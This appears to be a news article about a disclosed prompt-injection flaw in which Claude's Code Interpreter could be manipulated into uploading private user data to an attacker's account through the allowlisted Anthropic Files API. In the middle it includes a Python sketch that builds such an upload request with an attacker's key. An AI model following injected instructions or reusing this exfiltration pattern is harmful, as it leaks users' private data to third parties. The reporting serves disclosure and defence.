Claude can be tricked into sending your private company data to hackers - all it takes is some kind words


  • Claude’s Code Interpreter can be exploited to exfiltrate private user data via prompt injection
  • Researcher tricked Claude into uploading sandboxed data to his Anthropic account using API access
  • Anthropic now treats such vulnerabilities as reportable and urges users to monitor or disable access

Claude, one of the more popular AI tools out there, carries a vulnerability which allows threat actors to exfiltrate private user data, experts have warned.

Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, recently published an in-depth report on his findings. At the heart of the problem is Claude’s Code Interpreter, a sandboxed environment that lets the AI write and run code (for example, to analyze data or generate files) directly within a conversation.

Recently, Code Interpreter gained the ability to make network requests, which allows it to connect to the internet and, for example, download software packages.

Keeping an eye on Claude

By default, Anthropic’s Claude is supposed to access only “safe” domains like GitHub or PyPI, but among the approved domains is api.anthropic.com (the same API Claude itself uses), which opened the door for exploitation.

Wunderwuzzi showed he was able to trick Claude into reading private user data, saving that data inside the sandbox, and uploading it to his Anthropic account, via Claude’s Files API, using his own API key.

In other words, even though the network access seems restricted, the attacker can manipulate the model via prompt injection to exfiltrate user data. The exploit could transfer up to 30 MB per file, and multiple files could be uploaded.
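The pattern Rehberger described can be illustrated with a minimal, defanged sketch. The assumptions here are the Files API endpoint (`api.anthropic.com/v1/files`) and header names from Anthropic's public API, and a placeholder attacker key; the request is only constructed, never sent, and the real exploit used multipart form data rather than a raw body. The point is simply that the upload targets an "approved" domain while authenticating as the attacker:

```python
import urllib.request

# Placeholder attacker-controlled key -- NOT the victim's credentials.
ATTACKER_API_KEY = "sk-ant-attacker-key"

def build_upload_request(stolen_bytes: bytes) -> urllib.request.Request:
    """Prepare (but deliberately never send) a Files API upload request.

    The destination is api.anthropic.com -- the same host Claude itself
    talks to, and therefore on the default allowlist -- yet the x-api-key
    header routes the file into the attacker's account, not the user's.
    """
    return urllib.request.Request(
        url="https://api.anthropic.com/v1/files",
        data=stolen_bytes,  # real exploit: multipart upload, up to 30 MB/file
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
        },
        method="POST",
    )

req = build_upload_request(b"<private user data read from the sandbox>")
print(req.full_url)
```

Because domain-based filtering only inspects the host, not whose credentials the request carries, the allowlist alone cannot distinguish this upload from Claude's own legitimate API traffic.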

Wunderwuzzi disclosed his findings to Anthropic via HackerOne, and even though the company initially classified it as a “model safety issue,” not a “security vulnerability,” it later acknowledged that such exfiltration bugs are in scope for reporting. At first, Anthropic said users should “monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly.”

In a subsequent update, Rehberger wrote: “Anthropic has confirmed that data exfiltration vulnerabilities such as this one are in-scope for reporting, and this issue should not have been closed as out-of-scope,” adding: “There was a process hiccup they will work on addressing.”

His suggestion to Anthropic is to limit Claude’s network communications to the user’s own account only; in the meantime, users should monitor Claude’s activity closely, or disable network access if concerned.

Via The Register




Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
